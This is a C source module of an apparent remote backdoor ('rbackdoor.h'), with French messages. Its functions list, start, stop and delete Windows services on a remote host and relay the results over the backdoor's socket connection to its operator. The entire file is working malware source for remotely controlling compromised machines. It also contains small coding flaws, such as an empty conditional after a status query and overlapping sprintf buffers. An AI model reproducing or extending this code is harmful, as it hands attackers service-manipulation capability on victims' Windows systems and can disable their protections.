#include "rbackdoor.h"

/*************************************************************/
/* Get status of a service                                   */
/*************************************************************/

void GetCurrentStatus(DWORD p_dwType, int p_iIndex)
{
	switch (p_dwType) {
		
		case SERVICE_STOPPED:
			rsend(ConnectSocket, "Not running");
			break;
			
		case SERVICE_START_PENDING:
			rsend(ConnectSocket, "Starting");
			break;
			
		case SERVICE_STOP_PENDING:
			rsend(ConnectSocket, "Stopping");
			break;
			
		case SERVICE_RUNNING:
			rsend(ConnectSocket, "Running");
			break;
			
		case SERVICE_CONTINUE_PENDING:
			rsend(ConnectSocket, "Continue is pending");
			break;
			
		case SERVICE_PAUSE_PENDING:
			rsend(ConnectSocket, "Pause is pending");
			break;
			
		case SERVICE_PAUSED:
			rsend(ConnectSocket, "Paused");
			break;
	}
}

/*************************************************************/
/* Get all presents services on the remote Box               */
/*************************************************************/

int GetWindowServices(char *host, int type)
{
	BOOL retVal;
	DWORD dwBytesNeeded=0, dwServicesReturned = 0, dwResumedHandle = 0, dwBytes;
	ENUM_SERVICE_STATUS *pServices = NULL, service;
	SC_HANDLE hHandle;
	unsigned iIndex;
	char *buffer;
	
	if(strlen(host) < 1 || type == 0)
	{
		Proc_help("getservices");
		return(-1);
	}
	
	hHandle = OpenSCManager(host, NULL, SC_MANAGER_ENUMERATE_SERVICE);
	
	if (!hHandle) {
		rsend(ConnectSocket, "Error: Erreur lors de l'initialisation du SCManager\n");
		return(-1);
	}
	
	buffer = (char *)GlobalAlloc(GPTR, 1024);
	
	retVal = EnumServicesStatus(hHandle, SERVICE_WIN32 | SERVICE_DRIVER, SERVICE_STATE_ALL,
	&service, sizeof(ENUM_SERVICE_STATUS), &dwBytesNeeded, &dwServicesReturned,
	&dwResumedHandle);
	
	if(!retVal) {
		if (ERROR_MORE_DATA == GetLastError()) {
			dwBytes = sizeof(ENUM_SERVICE_STATUS) + dwBytesNeeded;
			pServices = (ENUM_SERVICE_STATUS *)GlobalAlloc(GPTR, dwBytes);
			
			switch(type)
			{
				case 1:
					EnumServicesStatus(hHandle, SERVICE_WIN32, SERVICE_STATE_ALL, pServices, dwBytes, &dwBytesNeeded, &dwServicesReturned, &dwResumedHandle);
					break;
				case 2:
					EnumServicesStatus(hHandle, SERVICE_DRIVER, SERVICE_STATE_ALL, pServices, dwBytes, &dwBytesNeeded, &dwServicesReturned, &dwResumedHandle);
					break;
			}
			
			sprintf(buffer, "\n--------------------------------------------------------------\nDisplay Name\t|\t Service Name\t|\t Status\n--------------------------------------------------------------\n");
			rsend(ConnectSocket, buffer);
			
			for (iIndex=0; iIndex<dwServicesReturned; iIndex++) {
				sprintf(buffer, " > DISPLAY NAME : %s > NAME : %s > STATUS : ", (pServices + iIndex)->lpDisplayName, (pServices + iIndex)->lpServiceName);
				rsend(ConnectSocket, buffer);
				GetCurrentStatus((pServices + iIndex)->ServiceStatus.dwCurrentState, iIndex);
				rsend(ConnectSocket, "\n--------------------------------------------------------------\n");
			}
			
			GlobalFree(pServices);
			GlobalFree(buffer);
			pServices = NULL;
		}
		else {
			GlobalFree(buffer);
			return(-1);
		}
	}
	CloseServiceHandle(hHandle);
	return(0);
}

/*************************************************************/
/* Start a selected service on the remote box                */
/*************************************************************/

int RStartService(char *host, char *ServiceName)
{
	SC_HANDLE schService=NULL, schSCManager;
	SERVICE_STATUS ssStatus;
	DWORD dwOldCheckPoint, dwStartTickCount, dwWaitTime, dwStatus;
	char *buffer;
	
	if(strlen(host) < 1 || strlen(ServiceName) < 1)
	{
		Proc_help("startservice");
		return(-1);
	}
	
	schSCManager = OpenSCManager(host, NULL, SC_MANAGER_ALL_ACCESS);
	schService = OpenService(schSCManager, ServiceName, SERVICE_ALL_ACCESS);
	if (schService == NULL) {
		rsend(ConnectSocket, "Error: Erreur lors de l'ouverture du service.\n");
		return(-1);
	}
	
	if (!StartService(schService, 0,NULL))
	{
		rsend(ConnectSocket, "Error: Erreur lors de la tentative de demarrage du service.\n");
		return(-1);
	}
	else
	{
		rsend(ConnectSocket, "msg: Service start pending.\n");
	}
	if (!QueryServiceStatus(schService, &ssStatus))
	{
		rsend(ConnectSocket, "Error: Erreur pendant la procedure QueryServiceStatus.\n");
		return(-1);
	}
	
	dwStartTickCount = GetTickCount();
	dwOldCheckPoint = ssStatus.dwCheckPoint;
	
	while (ssStatus.dwCurrentState == SERVICE_START_PENDING)
	{
		dwWaitTime = ssStatus.dwWaitHint / 10;
		if(dwWaitTime < 1000)
			dwWaitTime = 1000;
		else if (dwWaitTime > 10000)
			dwWaitTime = 10000;
		
		Sleep(dwWaitTime);
		
		if (!QueryServiceStatus(schService, &ssStatus))
			
			if (ssStatus.dwCheckPoint > dwOldCheckPoint)
			{
				dwStartTickCount = GetTickCount();
				dwOldCheckPoint = ssStatus.dwCheckPoint;
			}
			else
			{
				if(GetTickCount()-dwStartTickCount > ssStatus.dwWaitHint)
				{
					break;
				}
			}
	}
	if (ssStatus.dwCurrentState == SERVICE_RUNNING)
	{
		rsend(ConnectSocket, "msg: Service demarre avec succes");
		dwStatus = NO_ERROR;
	}
	else
	{
		buffer = (char *)GlobalAlloc(GPTR, 1024);
		sprintf(buffer, "\nService not started. \n");
		sprintf(buffer, "%sCurrent State: %d\n",buffer, ssStatus.dwCurrentState);
		sprintf(buffer, "%sExit Code: %d\n",buffer, ssStatus.dwWin32ExitCode);
		sprintf(buffer, "%sService Specific Exit Code: %d\n",buffer, ssStatus.dwServiceSpecificExitCode);
		sprintf(buffer, "%sCheck Point: %d\n",buffer, ssStatus.dwCheckPoint);
		sprintf(buffer, "%sWait Hint: %d\n", buffer, ssStatus.dwWaitHint);
		rsend(ConnectSocket, buffer);
		dwStatus = GetLastError();
		GlobalFree(buffer);
	}
	
	CloseServiceHandle(schService);
	return dwStatus;
}

/*************************************************************/
/* Stop a selected service on the remote box                */
/*************************************************************/

int RStopService(char *host, char *ServiceName)
{
	SC_HANDLE schService=NULL, schSCManager;
	SERVICE_STATUS ssStatus;
	char *buffer;
	
	if(strlen(host) < 1 || strlen(ServiceName) < 1)
	{
		Proc_help("stopservice");
		return(-1);
	}
	
	schSCManager = OpenSCManager(host, NULL, SC_MANAGER_ALL_ACCESS);
	schService = OpenService(schSCManager, ServiceName, SERVICE_STOP);
	if (schService == NULL) {
		rsend(ConnectSocket, "Error: Erreur lors de l'ouverture du service.\n");
		return(-1);
	}
	
	if (!ControlService(schService, SERVICE_CONTROL_STOP, &ssStatus))
	{
		rsend(ConnectSocket, "Error: Erreur lors de la tentative d'arret du service. (Le service est probablement deja arrete)\n");
		return(-1);
	}
	
	buffer = (char *)GlobalAlloc(GPTR, 1024);
	sprintf(buffer, "Service arrete avec succes.\n");
	sprintf(buffer, "%sCurrent State: %d\n",buffer, ssStatus.dwCurrentState);
	sprintf(buffer, "%sExit Code: %d\n",buffer, ssStatus.dwWin32ExitCode);
	sprintf(buffer, "%sService Specific Exit Code: %d\n",buffer, ssStatus.dwServiceSpecificExitCode);
	sprintf(buffer, "%sCheck Point: %d\n",buffer, ssStatus.dwCheckPoint);
	sprintf(buffer, "%sWait Hint: %d\n", buffer, ssStatus.dwWaitHint);
	rsend(ConnectSocket, buffer);
	GlobalFree(buffer);
	
	return(0);
}

/*************************************************************/
/* Delete a selected service on the remote box               */
/*************************************************************/

int RDeleteService(char *host, char *ServiceName)
{
	SC_HANDLE schService=NULL, schSCManager;
	
	if(strlen(host) < 1 || strlen(ServiceName) < 1)
	{
		Proc_help("delservice");
		return(-1);
	}
	
	schSCManager = OpenSCManager(host, NULL, SC_MANAGER_ALL_ACCESS);
	schService = OpenService(schSCManager, ServiceName, DELETE);
	if (schService == NULL) {
		rsend(ConnectSocket, "Error: Erreur lors de l'ouverture du service.\n");
		return(-1);
	}
	
	if (!DeleteService(schService)) {
		rsend(ConnectSocket, "Error: Erreur lors de la tentative de suppresion du service\n");
		return(-1);
	}
	else rsend(ConnectSocket, "Service efface avec succes.\n");
	
	CloseServiceHandle(schService);
	return(0);
}



